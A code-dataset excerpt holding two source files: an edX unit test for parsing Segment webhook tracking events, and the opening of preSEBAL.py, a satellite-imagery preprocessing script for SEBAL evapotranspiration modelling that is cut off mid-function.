repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
mbareta/edx-platform-ft
|
common/djangoapps/track/views/tests/test_segmentio.py
|
11
|
22013
|
"""Ensure we can parse events sent to us from the Segment webhook integration"""
from datetime import datetime
import json
from ddt import ddt, data, unpack
from mock import sentinel
from nose.plugins.attrib import attr
from django.contrib.auth.models import User
from django.test.client import RequestFactory
from django.test.utils import override_settings
from openedx.core.lib.tests.assertions.events import assert_event_matches
from track.middleware import TrackMiddleware
from track.tests import EventTrackingTestCase
from track.views import segmentio
SECRET = 'anything'
ENDPOINT = '/segmentio/test/event'
USER_ID = 10
MOBILE_SHIM_PROCESSOR = [
{'ENGINE': 'track.shim.LegacyFieldMappingProcessor'},
{'ENGINE': 'track.shim.PrefixedEventProcessor'},
]
def expect_failure_with_message(message):
"""Ensure the test raises an exception and does not emit an event"""
def test_decorator(func):
def test_decorated(self, *args, **kwargs):
self.assertRaisesRegexp(segmentio.EventValidationError, message, func, self, *args, **kwargs)
self.assert_no_events_emitted()
return test_decorated
return test_decorator
@attr('shard_3')
@ddt
@override_settings(
TRACKING_SEGMENTIO_WEBHOOK_SECRET=SECRET,
TRACKING_IGNORE_URL_PATTERNS=[ENDPOINT],
TRACKING_SEGMENTIO_ALLOWED_TYPES=['track'],
TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES=['.bi.'],
TRACKING_SEGMENTIO_SOURCE_MAP={'test-app': 'mobile'},
EVENT_TRACKING_PROCESSORS=MOBILE_SHIM_PROCESSOR,
)
class SegmentIOTrackingTestCase(EventTrackingTestCase):
"""Test processing of Segment events"""
def setUp(self):
super(SegmentIOTrackingTestCase, self).setUp()
self.maxDiff = None # pylint: disable=invalid-name
self.request_factory = RequestFactory()
def test_get_request(self):
request = self.request_factory.get(ENDPOINT)
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 405)
self.assert_no_events_emitted()
@override_settings(
TRACKING_SEGMENTIO_WEBHOOK_SECRET=None
)
def test_no_secret_config(self):
request = self.request_factory.post(ENDPOINT)
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 401)
self.assert_no_events_emitted()
def test_no_secret_provided(self):
request = self.request_factory.post(ENDPOINT)
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 401)
self.assert_no_events_emitted()
def test_secret_mismatch(self):
request = self.create_request(key='y')
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 401)
self.assert_no_events_emitted()
def create_request(self, key=None, **kwargs):
"""Create a fake request that emulates a request from the Segment servers to ours"""
if key is None:
key = SECRET
request = self.request_factory.post(ENDPOINT + "?key=" + key, **kwargs)
if 'data' in kwargs:
request.json = json.loads(kwargs['data'])
return request
@data('identify', 'Group', 'Alias', 'Page', 'identify', 'screen')
def test_segmentio_ignore_actions(self, action):
self.post_segmentio_event(action=action)
self.assert_no_events_emitted()
@data('edx.bi.some_name', 'EDX.BI.CAPITAL_NAME')
def test_segmentio_ignore_names(self, name):
self.post_segmentio_event(name=name)
self.assert_no_events_emitted()
def post_segmentio_event(self, **kwargs):
"""Post a fake Segment event to the view that processes it"""
request = self.create_request(
data=self.create_segmentio_event_json(**kwargs),
content_type='application/json'
)
segmentio.track_segmentio_event(request)
def create_segmentio_event(self, **kwargs):
"""Populate a fake Segment event with data of interest"""
action = kwargs.get('action', 'Track')
sample_event = {
"userId": kwargs.get('user_id', USER_ID),
"event": "Did something",
"properties": {
'name': kwargs.get('name', str(sentinel.name)),
'data': kwargs.get('data', {}),
'context': {
'course_id': kwargs.get('course_id') or '',
'app_name': 'edx.mobile.android',
}
},
"channel": 'server',
"context": {
"library": {
"name": kwargs.get('library_name', 'test-app'),
"version": "unknown"
},
"app": {
"version": "1.0.1",
},
'userAgent': str(sentinel.user_agent),
},
"receivedAt": "2014-08-27T16:33:39.100Z",
"timestamp": "2014-08-27T16:33:39.215Z",
"type": action.lower(),
"projectId": "u0j33yjkr8",
"messageId": "qy52hwp4",
"version": 2,
"integrations": {},
"options": {
"library": "unknown",
"providers": {}
},
"action": action
}
if 'context' in kwargs:
sample_event['properties']['context'].update(kwargs['context'])
return sample_event
def create_segmentio_event_json(self, **kwargs):
"""Return a json string containing a fake Segment event"""
return json.dumps(self.create_segmentio_event(**kwargs))
def test_segmentio_ignore_unknown_libraries(self):
self.post_segmentio_event(library_name='foo')
self.assert_no_events_emitted()
@expect_failure_with_message(segmentio.ERROR_USER_NOT_EXIST)
def test_no_user_for_user_id(self):
self.post_segmentio_event(user_id=40)
@expect_failure_with_message(segmentio.ERROR_INVALID_USER_ID)
def test_invalid_user_id(self):
self.post_segmentio_event(user_id='foobar')
@data('foo/bar/baz', 'course-v1:foo+bar+baz')
def test_success(self, course_id):
middleware = TrackMiddleware()
request = self.create_request(
data=self.create_segmentio_event_json(data={'foo': 'bar'}, course_id=course_id),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
middleware.process_request(request)
# The middleware normally emits an event, make sure it doesn't in this case.
self.assert_no_events_emitted()
try:
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 200)
expected_event = {
'accept_language': '',
'referer': '',
'username': str(sentinel.username),
'ip': '',
'session': '',
'event_source': 'mobile',
'event_type': str(sentinel.name),
'name': str(sentinel.name),
'event': {'foo': 'bar'},
'agent': str(sentinel.user_agent),
'page': None,
'time': datetime.strptime("2014-08-27T16:33:39.215Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
'host': 'testserver',
'context': {
'application': {
'name': 'edx.mobile.android',
'version': '1.0.1',
},
'user_id': USER_ID,
'course_id': course_id,
'org_id': u'foo',
'path': ENDPOINT,
'client': {
'library': {
'name': 'test-app',
'version': 'unknown'
},
'app': {
'version': '1.0.1',
},
},
'received_at': datetime.strptime("2014-08-27T16:33:39.100Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
},
}
finally:
middleware.process_response(request, None)
assert_event_matches(expected_event, self.get_event())
def test_invalid_course_id(self):
request = self.create_request(
data=self.create_segmentio_event_json(course_id='invalid'),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
segmentio.track_segmentio_event(request)
self.assert_events_emitted()
@expect_failure_with_message(segmentio.ERROR_MISSING_NAME)
def test_missing_name(self):
sample_event_raw = self.create_segmentio_event()
del sample_event_raw['properties']['name']
request = self.create_request(
data=json.dumps(sample_event_raw),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
segmentio.track_segmentio_event(request)
@expect_failure_with_message(segmentio.ERROR_MISSING_DATA)
def test_missing_data(self):
sample_event_raw = self.create_segmentio_event()
del sample_event_raw['properties']['data']
request = self.create_request(
data=json.dumps(sample_event_raw),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
segmentio.track_segmentio_event(request)
@expect_failure_with_message(segmentio.ERROR_MISSING_TIMESTAMP)
def test_missing_timestamp(self):
sample_event_raw = self.create_event_without_fields('timestamp')
request = self.create_request(
data=json.dumps(sample_event_raw),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
segmentio.track_segmentio_event(request)
@expect_failure_with_message(segmentio.ERROR_MISSING_RECEIVED_AT)
def test_missing_received_at(self):
sample_event_raw = self.create_event_without_fields('receivedAt')
request = self.create_request(
data=json.dumps(sample_event_raw),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
segmentio.track_segmentio_event(request)
def create_event_without_fields(self, *fields):
"""Create a fake event and remove some fields from it"""
event = self.create_segmentio_event()
for field in fields:
if field in event:
del event[field]
return event
def test_string_user_id(self):
User.objects.create(pk=USER_ID, username=str(sentinel.username))
self.post_segmentio_event(user_id=str(USER_ID))
self.assert_events_emitted()
def test_hiding_failure(self):
sample_event_raw = self.create_event_without_fields('timestamp')
request = self.create_request(
data=json.dumps(sample_event_raw),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 200)
self.assert_no_events_emitted()
@data(
('edx.video.played', 'play_video'),
('edx.video.paused', 'pause_video'),
('edx.video.stopped', 'stop_video'),
('edx.video.loaded', 'load_video'),
('edx.video.position.changed', 'seek_video'),
('edx.video.transcript.shown', 'show_transcript'),
('edx.video.transcript.hidden', 'hide_transcript'),
)
@unpack
def test_video_event(self, name, event_type):
course_id = 'foo/bar/baz'
middleware = TrackMiddleware()
input_payload = {
'current_time': 132.134456,
'module_id': 'i4x://foo/bar/baz/some_module',
'code': 'mobile'
}
if name == 'edx.video.loaded':
# We use the same expected payload for all of these types of events, but the load video event is the only
# one that is not actually expected to contain a "current time" field. So we remove it from the expected
# event here.
del input_payload['current_time']
request = self.create_request(
data=self.create_segmentio_event_json(
name=name,
data=input_payload,
context={
'open_in_browser_url': 'https://testserver/courses/foo/bar/baz/courseware/Week_1/Activity/2',
'course_id': course_id,
'application': {
'name': 'edx.mobileapp.android',
'version': '29',
'component': 'videoplayer'
}
}),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
middleware.process_request(request)
try:
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 200)
expected_event = {
'accept_language': '',
'referer': '',
'username': str(sentinel.username),
'ip': '',
'session': '',
'event_source': 'mobile',
'event_type': event_type,
'name': name,
'agent': str(sentinel.user_agent),
'page': 'https://testserver/courses/foo/bar/baz/courseware/Week_1/Activity',
'time': datetime.strptime("2014-08-27T16:33:39.215Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
'host': 'testserver',
'context': {
'user_id': USER_ID,
'course_id': course_id,
'org_id': 'foo',
'path': ENDPOINT,
'client': {
'library': {
'name': 'test-app',
'version': 'unknown'
},
'app': {
'version': '1.0.1',
},
},
'application': {
'name': 'edx.mobileapp.android',
'version': '29',
'component': 'videoplayer'
},
'received_at': datetime.strptime("2014-08-27T16:33:39.100Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
},
'event': {
'currentTime': 132.134456,
'id': 'i4x-foo-bar-baz-some_module',
'code': 'mobile'
}
}
if name == 'edx.video.loaded':
# We use the same expected payload for all of these types of events, but the load video event is the
# only one that is not actually expected to contain a "current time" field. So we remove it from the
# expected event here.
del expected_event['event']['currentTime']
finally:
middleware.process_response(request, None)
actual_event = self.get_event()
assert_event_matches(expected_event, actual_event)
@data(
# Verify positive slide case. Verify slide to onSlideSeek. Verify
# edx.video.seeked emitted from iOS v1.0.02 is changed to
# edx.video.position.changed.
(1, 1, "seek_type", "slide", "onSlideSeek", "edx.video.seeked", "edx.video.position.changed", 'edx.mobileapp.iOS', '1.0.02'),
# Verify negative slide case. Verify slide to onSlideSeek. Verify
# edx.video.seeked to edx.video.position.changed.
(-2, -2, "seek_type", "slide", "onSlideSeek", "edx.video.seeked", "edx.video.position.changed", 'edx.mobileapp.iOS', '1.0.02'),
# Verify +30 is changed to -30 which is incorrectly emitted in iOS
# v1.0.02. Verify skip to onSkipSeek
(30, -30, "seek_type", "skip", "onSkipSeek", "edx.video.position.changed", "edx.video.position.changed", 'edx.mobileapp.iOS', '1.0.02'),
# Verify the correct case of -30 is also handled as well. Verify skip
# to onSkipSeek
(-30, -30, "seek_type", "skip", "onSkipSeek", "edx.video.position.changed", "edx.video.position.changed", 'edx.mobileapp.iOS', '1.0.02'),
# Verify positive slide case where onSkipSeek is changed to
# onSlideSkip. Verify edx.video.seeked emitted from Android v1.0.02 is
# changed to edx.video.position.changed.
(1, 1, "type", "onSkipSeek", "onSlideSeek", "edx.video.seeked", "edx.video.position.changed", 'edx.mobileapp.android', '1.0.02'),
# Verify positive slide case where onSkipSeek is changed to
# onSlideSkip. Verify edx.video.seeked emitted from Android v1.0.02 is
# changed to edx.video.position.changed.
(-2, -2, "type", "onSkipSeek", "onSlideSeek", "edx.video.seeked", "edx.video.position.changed", 'edx.mobileapp.android', '1.0.02'),
# Verify positive skip case where onSkipSeek is not changed and does
# not become negative.
(30, 30, "type", "onSkipSeek", "onSkipSeek", "edx.video.position.changed", "edx.video.position.changed", 'edx.mobileapp.android', '1.0.02'),
# Verify positive skip case where onSkipSeek is not changed.
(-30, -30, "type", "onSkipSeek", "onSkipSeek", "edx.video.position.changed", "edx.video.position.changed", 'edx.mobileapp.android', '1.0.02')
)
@unpack
def test_previous_builds(self,
requested_skip_interval,
expected_skip_interval,
seek_type_key,
seek_type,
expected_seek_type,
name,
expected_name,
platform,
version,
):
"""
Test backwards compatibility of previous app builds
iOS version 1.0.02: Incorrectly emits the skip back 30 seconds as +30
instead of -30.
Android version 1.0.02: Skip and slide were both being returned as a
skip. Skip or slide is determined by checking if the skip time is == -30
Additionally, for both of the above mentioned versions, edx.video.seeked
was sent instead of edx.video.position.changed
"""
course_id = 'foo/bar/baz'
middleware = TrackMiddleware()
input_payload = {
"code": "mobile",
"new_time": 89.699177437,
"old_time": 119.699177437,
seek_type_key: seek_type,
"requested_skip_interval": requested_skip_interval,
'module_id': 'i4x://foo/bar/baz/some_module',
}
request = self.create_request(
data=self.create_segmentio_event_json(
name=name,
data=input_payload,
context={
'open_in_browser_url': 'https://testserver/courses/foo/bar/baz/courseware/Week_1/Activity/2',
'course_id': course_id,
'application': {
'name': platform,
'version': version,
'component': 'videoplayer'
}
},
),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
middleware.process_request(request)
try:
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 200)
expected_event = {
'accept_language': '',
'referer': '',
'username': str(sentinel.username),
'ip': '',
'session': '',
'event_source': 'mobile',
'event_type': "seek_video",
'name': expected_name,
'agent': str(sentinel.user_agent),
'page': 'https://testserver/courses/foo/bar/baz/courseware/Week_1/Activity',
'time': datetime.strptime("2014-08-27T16:33:39.215Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
'host': 'testserver',
'context': {
'user_id': USER_ID,
'course_id': course_id,
'org_id': 'foo',
'path': ENDPOINT,
'client': {
'library': {
'name': 'test-app',
'version': 'unknown'
},
'app': {
'version': '1.0.1',
},
},
'application': {
'name': platform,
'version': version,
'component': 'videoplayer'
},
'received_at': datetime.strptime("2014-08-27T16:33:39.100Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
},
'event': {
"code": "mobile",
"new_time": 89.699177437,
"old_time": 119.699177437,
"type": expected_seek_type,
"requested_skip_interval": expected_skip_interval,
'id': 'i4x-foo-bar-baz-some_module',
}
}
finally:
middleware.process_response(request, None)
actual_event = self.get_event()
assert_event_matches(expected_event, actual_event)
|
agpl-3.0
|
wateraccounting/SEBAL
|
PreSEBAL/preSEBAL.py
|
1
|
110216
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 08 15:09:49 2016
#test Github
@author: tih
"""
import numpy as np
import os
import scipy.interpolate
import gdal
from openpyxl import load_workbook
import osr
from datetime import datetime, timedelta
import pandas as pd
import shutil
import glob
from netCDF4 import Dataset
import warnings
import SEBAL.pySEBAL.pySEBAL_code as SEBAL
def main():
####################################################################################################################
############################################# CREATE INPUT FOR SEBAL RUN ###########################################
####################################################################################################################
####################################################################################################################
##################################################### PreHANTS ####################################################
####################################################################################################################
# PreHANTS
# Part 1: Define input by user
# Part 2: Set parameters and output folder
# Part 3: RUN SEBAL
# Part 4: HANTS
# Part 5: post HANTS
# Part 6: Write output
####################################################################################################################
################################################# PreHANTS part 1 ##################################################
####################################################################################################################
VegetationExcel =r"E:\Project_2\UAE\Excel\Excel_PreSEBAL_v1_0.xlsx" # This excel defines the p and c factor and vegetation height.
####################################################################################################################
################################################# PreHANTS part 2 ##################################################
####################################################################################################################
# Open Excel workbook used for Vegetation c and p factor conversions
wb_veg = load_workbook(VegetationExcel, data_only=True)
ws_veg = wb_veg['General_Input']
# Input for preSEBAL.py
start_date = "%s" %str(ws_veg['B2'].value)
end_date = "%s" %str(ws_veg['B3'].value)
inputExcel= r"%s" %str(ws_veg['B4'].value) # The excel with all the SEBAL input data
LU_data_FileName = r"%s" %str(ws_veg['B5'].value) # Path to Land Use map
output_folder = r"%s" %str(ws_veg['B7'].value)
# optional paramater
DSSF_Folder= r"%s" %str(ws_veg['B6'].value)
######################## Load Excels ##########################################
# Open Excel workbook for SEBAL inputs
wb = load_workbook(inputExcel, data_only=True)
# Get length of EXCEL sheet
ws = wb['General_Input']
ws2 = wb['VIIRS_PROBAV_Input']
endExcel=int(ws.max_row)
# Create Dict
SEBAL_RUNS = dict()
for number in range(2,endExcel+1):
input_folder_SEBAL = str(ws['B%d' % number].value)
output_folder_SEBAL = str(ws['C%d' % number].value)
Image_Type = int(ws['D%d' % number].value)
PROBA_V_name = str(ws2['D%d' % number].value)
VIIRS_name = str(ws2['B%d' % number].value)
SEBAL_RUNS[number] = {'input_folder': input_folder_SEBAL, 'output_folder': output_folder_SEBAL, 'image_type': Image_Type,'PROBA_V_name': PROBA_V_name,'VIIRS_name': VIIRS_name}
Kind_Of_Runs_Dict = {}
for k, v in SEBAL_RUNS.iteritems():
Kind_Of_Runs_Dict.setdefault(v['image_type'], []).append(k)
######################## Create output folders ##########################################
output_folder_PreSEBAL_SEBAL = os.path.join(output_folder,'PreSEBAL_SEBAL_out')
input_folder_HANTS = os.path.join(output_folder,'HANTS_in')
output_folder_PreSEBAL = os.path.join(output_folder,'PreSEBAL_out')
temp_folder_PreSEBAL = os.path.join(output_folder,'PreSEBAL_temp')
temp_folder_PreSEBAL_LST = os.path.join(temp_folder_PreSEBAL,'LST')
NDVI_outfolder = os.path.join(output_folder_PreSEBAL_SEBAL,'NDVI')
Albedo_outfolder = os.path.join(output_folder_PreSEBAL_SEBAL,'Albedo')
WaterMask_outfolder = os.path.join(output_folder_PreSEBAL_SEBAL,'Water_Mask')
LAI_outfolder = os.path.join(output_folder_PreSEBAL,'LAI')
ALBEDO_outfolder_end = os.path.join(output_folder_PreSEBAL,'ALBEDO')
NDVI_outfolder_end = os.path.join(output_folder_PreSEBAL,'NDVI')
WaterMask_outfolder_end = os.path.join(output_folder_PreSEBAL,'Water_Mask')
TRANS_outfolder = os.path.join(output_folder_PreSEBAL,'Transmissivity')
Surface_Temperature_outfolder = os.path.join(output_folder_PreSEBAL_SEBAL,'Surface_Temperature')
output_folder_HANTS_end_sharp = os.path.join(output_folder_PreSEBAL, 'LST_Sharpened')
output_folder_HANTS_end_Veg = os.path.join(output_folder_PreSEBAL, 'Vegetation_Height')
output_folder_p_factor = os.path.join(output_folder_PreSEBAL, 'p_factor')
output_folder_LUE = os.path.join(output_folder_PreSEBAL, 'LUE')
if not os.path.exists(output_folder_PreSEBAL_SEBAL):
os.makedirs(output_folder_PreSEBAL_SEBAL)
if not os.path.exists(output_folder_PreSEBAL):
os.mkdir(output_folder_PreSEBAL)
if not os.path.exists(temp_folder_PreSEBAL):
os.mkdir(temp_folder_PreSEBAL)
if not os.path.exists(NDVI_outfolder):
os.makedirs(NDVI_outfolder)
if not os.path.exists(Albedo_outfolder):
os.makedirs(Albedo_outfolder)
if not os.path.exists(WaterMask_outfolder):
os.makedirs(WaterMask_outfolder)
if not os.path.exists(LAI_outfolder):
os.makedirs(LAI_outfolder)
if not os.path.exists(ALBEDO_outfolder_end):
os.makedirs(ALBEDO_outfolder_end)
if not os.path.exists(NDVI_outfolder_end):
os.makedirs(NDVI_outfolder_end)
if not os.path.exists(WaterMask_outfolder_end):
os.makedirs(WaterMask_outfolder_end)
if not os.path.exists(temp_folder_PreSEBAL_LST):
os.makedirs(temp_folder_PreSEBAL_LST)
if not os.path.exists(Surface_Temperature_outfolder):
os.makedirs(Surface_Temperature_outfolder)
if not os.path.exists(TRANS_outfolder):
os.makedirs(TRANS_outfolder)
if not os.path.exists(output_folder_HANTS_end_sharp):
os.mkdir(output_folder_HANTS_end_sharp)
if not os.path.exists(output_folder_HANTS_end_Veg):
os.mkdir(output_folder_HANTS_end_Veg)
if not os.path.exists(output_folder_p_factor):
os.mkdir(output_folder_p_factor)
if not os.path.exists(output_folder_LUE):
os.mkdir(output_folder_LUE)
# Do not show warnings
warnings.filterwarnings('ignore')
####################################################################################################################
################################################### RUN SEBAL part 3 ###############################################
####################################################################################################################
############################## Define General info ############################
for number in Kind_Of_Runs_Dict[2]: # Number defines the column of the inputExcel
print(number)
if not (SEBAL_RUNS[number]['PROBA_V_name'] == 'None' and SEBAL_RUNS[number]['VIIRS_name'] == 'None'):
Rp = 0.91 # Path radiance in the 10.4-12.5 µm band (W/m2/sr/µm)
tau_sky = 0.866 # Narrow band transmissivity of air, range: [10.4-12.5 µm]
surf_temp_offset = 3 # Surface temperature offset for water
######################## Open General info from SEBAL Excel ###################
# Open the General_Input sheet
ws = wb['General_Input']
# Extract the input and output folder, and Image type from the excel file
input_folder = str(ws['B%d' % number].value)
Image_Type = int(2) # Type of Image (1=Landsat & 2 = VIIRS & GLOBA-V)
# Extract the Path to the DEM map from the excel file
DEM_fileName = '%s' %str(ws['E%d' % number].value) #'DEM_HydroShed_m'
# Open DEM and create Latitude and longitude files
lat,lon,lat_fileName,lon_fileName=SEBAL.DEM_lat_lon(DEM_fileName, temp_folder_PreSEBAL)
######################## Extract general data for Landsat ##########################################
if Image_Type == 1:
# Open the Landsat_Input sheet
ws = wb['Landsat_Input']
# Extract Landsat name, number and amount of thermal bands from excel file
Name_Landsat_Image = str(ws['B%d' % number].value) # From glovis.usgs.gov
Landsat_nr = int(ws['C%d' % number].value) # Type of Landsat (LS) image used (LS5, LS7, or LS8)
Bands_thermal = int(ws['D%d' %number].value) # Number of LS bands to use to retrieve land surface
# Pixel size of the model
pixel_spacing=int(30)
# the path to the MTL file of landsat
Landsat_meta_fileName = os.path.join(input_folder, '%s_MTL.txt' % Name_Landsat_Image)
# read out the general info out of the MTL file in Greenwich Time
year, DOY, hour, minutes, UTM_Zone, Sun_elevation = SEBAL.info_general_metadata(Landsat_meta_fileName) # call definition info_general_metadata
date=datetime.strptime('%s %s'%(year,DOY), '%Y %j')
month = date.month
day = date.day
# define the kind of sensor and resolution of the sensor
sensor1 = 'L%d' % Landsat_nr
sensor2 = 'L%d' % Landsat_nr
sensor3 = 'L%d' % Landsat_nr
res1 = '30m'
res2 = '%sm' %int(pixel_spacing)
res3 = '30m'
# Set the start parameter for determining transmissivity at 0
Determine_transmissivity = 0
######################## Extract general data for VIIRS-PROBAV ##########################################
if Image_Type == 2:
# Open the VIIRS_PROBAV_Input sheet
ws = wb['VIIRS_PROBAV_Input']
# Extract the name of the thermal and quality VIIRS image from the excel file
Name_VIIRS_Image_TB = '%s' %str(ws['B%d' % number].value)
# Extract the name to the PROBA-V image from the excel file
Name_PROBAV_Image = '%s' %str(ws['D%d' % number].value) # Must be a tiff file
# Pixel size of the model
pixel_spacing=int(100)
# UTM Zone of the end results
UTM_Zone = float(ws['G%d' % number].value)
if not Name_VIIRS_Image_TB == 'None':
#Get time from the VIIRS dataset name (IMPORTANT TO KEEP THE TEMPLATE OF THE VIIRS NAME CORRECT example: VIIRS_SVI05_npp_d20161021_t0956294_e1002080_b25822_c20161021160209495952_noaa_ops.tif)
Total_Day_VIIRS = Name_VIIRS_Image_TB.split('_')[3]
Total_Time_VIIRS = Name_VIIRS_Image_TB.split('_')[4]
# Get the information out of the VIIRS name in GMT (Greenwich time)
year = int(Total_Day_VIIRS[1:5])
month = int(Total_Day_VIIRS[5:7])
day = int(Total_Day_VIIRS[7:9])
Startdate = '%d-%02d-%02d' % (year,month,day)
DOY=datetime.strptime(Startdate,'%Y-%m-%d').timetuple().tm_yday
hour = int(Total_Time_VIIRS[1:3])
minutes = int(Total_Time_VIIRS[3:5])
# If this is runned correctly, we can determine transmissivity
ws = wb['Meteo_Input']
Field_Radiation_24 = '%s' %str(ws['J%d' % number].value)
Field_Trans_24 = '%s' %str(ws['K%d' % number].value)
Determine_transmissivity = 1
# else use PROBA-V day but than no transmissivity can be determined for now
else:
# Get the day and time from the PROBA-V
Band_PROBAVhdf_fileName = os.path.join(input_folder, '%s.HDF5' % (Name_PROBAV_Image))
g=gdal.Open(Band_PROBAVhdf_fileName, gdal.GA_ReadOnly)
Meta_data = g.GetMetadata()
Date_PROBAV = str(Meta_data['LEVEL3_RADIOMETRY_BLUE_OBSERVATION_START_DATE'])
year = int(Date_PROBAV.split("-")[0])
month = int(Date_PROBAV.split("-")[1])
day = int(Date_PROBAV.split("-")[2])
Var_name = '%d%02d%02d' %(year, month, day)
DOY=datetime.strptime(Var_name,'%Y%m%d').timetuple().tm_yday
# We cannot determine transmissivity
Determine_transmissivity = 0
# Determine the transmissivity if possible (Determine_transmissivity = 1)
if Determine_transmissivity == 1:
# Rounded difference of the local time from Greenwich (GMT) (hours):
delta_GTM = round(np.sign(lon[int(np.shape(lon)[0]/2), int(np.shape(lon)[1]/2)]) * lon[int(np.shape(lon)[0]/2), int(np.shape(lon)[1]/2)] * 24 / 360)
if np.isnan(delta_GTM) == True:
delta_GTM = round(np.nanmean(lon) * np.nanmean(lon) * 24 / 360)
# Calculate local time
hour += delta_GTM
if hour < 0.0:
day -= 1
hour += 24
if hour >= 24:
day += 1
hour -= 24
# define the kind of sensor and resolution of the sensor
sensor1 = 'PROBAV'
sensor2 = 'VIIRS'
res1 = '375m'
res2 = '%sm' %int(pixel_spacing)
res3 = '30m'
######################## Extract general data from DEM file and create Slope map ##########################################
# Variable date name
Var_name = '%d%02d%02d' %(year, month, day)
# Reproject from Geog Coord Syst to UTM -
# 1) DEM - Original DEM coordinates is Geographic: lat, lon
dest, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset(
DEM_fileName, pixel_spacing, UTM_Zone=UTM_Zone)
band = dest.GetRasterBand(1) # Get the reprojected dem band
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
# Read out the DEM band and print the DEM properties
data_DEM = band.ReadAsArray(0, 0, ncol, nrow)
# 2) Latitude file - reprojection
# reproject latitude to the landsat projection and save as tiff file
lat_rep, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset(
lat_fileName, pixel_spacing, UTM_Zone=UTM_Zone)
# Get the reprojected latitude data
lat_proy = lat_rep.GetRasterBand(1).ReadAsArray(0, 0, ncol, nrow)
# 3) Longitude file - reprojection
# reproject longitude to the landsat projection and save as tiff file
lon_rep, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset(lon_fileName, pixel_spacing, UTM_Zone=UTM_Zone)
# Get the reprojected longitude data
lon_proy = lon_rep.GetRasterBand(1).ReadAsArray(0, 0, ncol, nrow)
lon_fileName = os.path.join(temp_folder_PreSEBAL,'lon_resh.tif')
SEBAL.save_GeoTiff_proy(dest, lon_proy, lon_fileName, shape, nband=1)
# Calculate slope and aspect from the reprojected DEM
deg2rad,rad2deg,slope,aspect=SEBAL.Calc_Gradient(data_DEM, pixel_spacing)
if Determine_transmissivity == 1:
# calculate the coz zenith angle
Ra_mountain_24, Ra_inst, cos_zn_resh, dr, phi, delta = SEBAL.Calc_Ra_Mountain(lon,DOY,hour,minutes,lon_proy,lat_proy,slope,aspect)
cos_zn_fileName = os.path.join(temp_folder_PreSEBAL,'cos_zn.tif')
SEBAL.save_GeoTiff_proy(dest, cos_zn_resh, cos_zn_fileName, shape, nband=1)
# Save the Ra
Ra_inst_fileName = os.path.join(temp_folder_PreSEBAL,'Ra_inst.tif')
SEBAL.save_GeoTiff_proy(dest, Ra_inst, Ra_inst_fileName, shape, nband=1)
Ra_mountain_24_fileName = os.path.join(temp_folder_PreSEBAL,'Ra_mountain_24.tif')
SEBAL.save_GeoTiff_proy(dest, Ra_mountain_24, Ra_mountain_24_fileName, shape, nband=1)
#################### Calculate Transmissivity ##########################################
# Open the General_Input sheet
ws = wb['Meteo_Input']
# Extract the method radiation value
Value_Method_Radiation_inst = '%s' %str(ws['L%d' % number].value)
# Values to check if data is created
Check_Trans_inst = 0
Check_Trans_24 = 0
''' This is now turned of, so you need to fill in the instantanious transmissivity or Radiation
# Extract the data to the method of radiation
if int(Value_Method_Radiation_inst) == 2:
Field_Radiation_inst = '%s' %str(ws['N%d' % number].value)
if Field_Radiation_inst == 'None':
# Instantanious Transmissivity files must be created
Check_Trans_inst = 1
# Calculate Transmissivity
quarters_hours = np.ceil(minutes/30.) * 30
hours_GMT = hour - delta_GTM
if quarters_hours >= 60:
hours_GMT += 1
quarters_hours = 0
# Define the instantanious LANDSAF file
name_Landsaf_inst = 'HDF5_LSASAF_MSG_DSSF_MSG-Disk_%d%02d%02d%02d%02d.tif' %(year, month,day, hours_GMT, quarters_hours)
file_Landsaf_inst = os.path.join(DSSF_Folder,name_Landsaf_inst)
# Reproject the Ra_inst data to match the LANDSAF data
Ra_inst_3Km_dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Ra_inst_fileName, file_Landsaf_inst, method = 1)
Ra_inst_3Km = Ra_inst_3Km_dest.GetRasterBand(1).ReadAsArray()
Ra_inst_3Km[Ra_inst_3Km==0] = np.nan
# Open the Rs LANDSAF data
dest_Rs_inst_3Km = gdal.Open(file_Landsaf_inst)
Rs_inst_3Km = dest_Rs_inst_3Km.GetRasterBand(1).ReadAsArray()
Rs_inst_3Km = np.float_(Rs_inst_3Km)/10
Rs_inst_3Km[Rs_inst_3Km<0]=np.nan
# Get shape LANDSAF data
shape_trans=[dest_Rs_inst_3Km.RasterXSize , dest_Rs_inst_3Km.RasterYSize ]
# Calculate Transmissivity 3Km
Transmissivity_3Km = Rs_inst_3Km/Ra_inst_3Km
Transmissivity_3Km_fileName = os.path.join(output_folder_temp,'Transmissivity_3Km.tif')
